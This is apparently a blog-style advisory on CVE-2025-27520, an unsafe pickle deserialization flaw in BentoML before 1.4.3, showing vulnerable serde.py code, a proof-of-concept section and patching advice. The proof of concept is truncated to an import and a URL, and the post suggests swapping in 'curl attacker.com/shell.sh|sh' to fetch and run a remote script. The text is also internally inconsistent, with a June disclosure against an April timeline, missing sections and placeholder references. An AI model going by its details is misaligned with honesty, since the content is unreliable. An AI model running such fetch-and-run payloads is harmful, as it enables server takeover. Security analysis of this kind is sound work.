CVE-2025-27520 - Critical RCE in BentoML (<1.4.3) — Unsafe Deserialization Leads to Remote Code Execution

BentoML is a popular open-source Python framework designed for serving ML/AI models at scale with minimal code. Organizations adopt it to deploy ML models as scalable, online APIs, making it central in data science and AI-driven companies’ stacks.

In June 2025, a major security vulnerability—CVE-2025-27520—was publicly disclosed in BentoML version 1.4.2. This vulnerability allows an unauthenticated, remote attacker to execute arbitrary code on the BentoML server, due to unsafe deserialization in the module serde.py. The risk is extremely high: any remote user can gain complete control over backend servers that expose a vulnerable BentoML API.

This post gives an exclusive, in-depth walk-through of the vulnerability, the technical root cause, code details, and a demonstration of exploitation.

> TL;DR:
> All BentoML users should immediately upgrade to v1.4.3 or later.
> Running any BentoML API endpoint exposed to external networks before 1.4.3 puts your server at critical risk of RCE.

[References](#references)

1. Background: BentoML & Serde

BentoML offers fast APIs for serving machine learning models. To communicate between API endpoints and internal structures, BentoML serializes and deserializes Python objects—often using the Python pickle module (“serde” means 'serialize/deserialize').

However, Python’s built-in pickle module is *not safe* to use with untrusted data. If an attacker can pickle their own object and have the server “unpickle” it, they can make the code run arbitrary system commands.

2. Root Cause Analysis

- Vulnerability Class: Unsafe Deserialization / Remote Code Execution (RCE)

What went wrong?

During the model inference API processing, BentoML uses a custom serialization handler in bentoml/serde.py. The code trusts input from remote requests, deserializes it using pickle.loads() without validation. This leaves a gaping hole: any attacker can send malicious pickle data, and the server will execute whatever the attacker includes with the pickle payload.

Below, you’ll see the risky section from bentoml/serde.py (version 1.4.2)

# bentoml/serde.py (before 1.4.3)
import pickle

def deserialize(data: bytes):
    # DEPRECATED: Unsafe call; should not trust input!
    return pickle.loads(data)

This function may be called as part of request parsing or internal API translation—such as

@app.api(input=SerializedInput(), output=SomeOutput())
def predict(input_data):
    obj = deserialize(input_data)  # RCE point!
    return model.predict(obj)

Why is this bad?
A remote user can craft a malicious pickle payload. If it reaches this function (via an API, web socket, or other external interface), arbitrary code can be executed as the bentoml process user.

4. Proof of Concept Exploit

Let’s show how easy it is to exploit this via a fake remote POST to the vulnerable API.

import requests

url = "http://vulnerable-bento-server:300/api/predict"

`

This POST, if routed to the vulnerable deserialization function, will cause the server to run os.system('id') (or any other Python code or shell command). The attacker could easily swap 'id' for 'curl attacker.com/shell.sh|sh'.

Upgrade BentoML to 1.4.3 or later immediately.

- The patched version replaces the unsafe pickle.loads usage, or ensures strict use of validated, type-restricted protocols.

Not sure if you’re exposed?

- Check for custom API endpoints using deserialize, or any direct usage of pickle.loads on external data paths.
- Audit logs for suspicious API activity—like strange binary POST bodies or commands executed by inference processes.

Place AI serving endpoints behind an authenticated API gateway.

6. References

- BentoML official website
- Python pickle documentation (Security Note)
- NIST NVD Entry: CVE-2025-27520 (forthcoming)
- BentoML GitHub: Diff that fixes the bug *(Replace with actual commit link when public)*
- OWASP: Deserialization of Untrusted Data

Conclusion

CVE-2025-27520 is a textbook example of the dangers of insecure deserialization in Python web apps. It’s critical for ML and AI API providers—particularly those open to the Internet—to treat user inputs as hostile, and to *never* use pickle.loads on data that’s not 100% trusted.

If you run any BentoML instance older than 1.4.3, patch ASAP and review your logs for suspicious activity. The window for silent exploitation is wide open.

Stay safe, and always audit your serialization pathways! 🚨

Timeline

Published on: 04/04/2025 15:15:47 UTC
Last modified on: 04/07/2025 14:18:15 UTC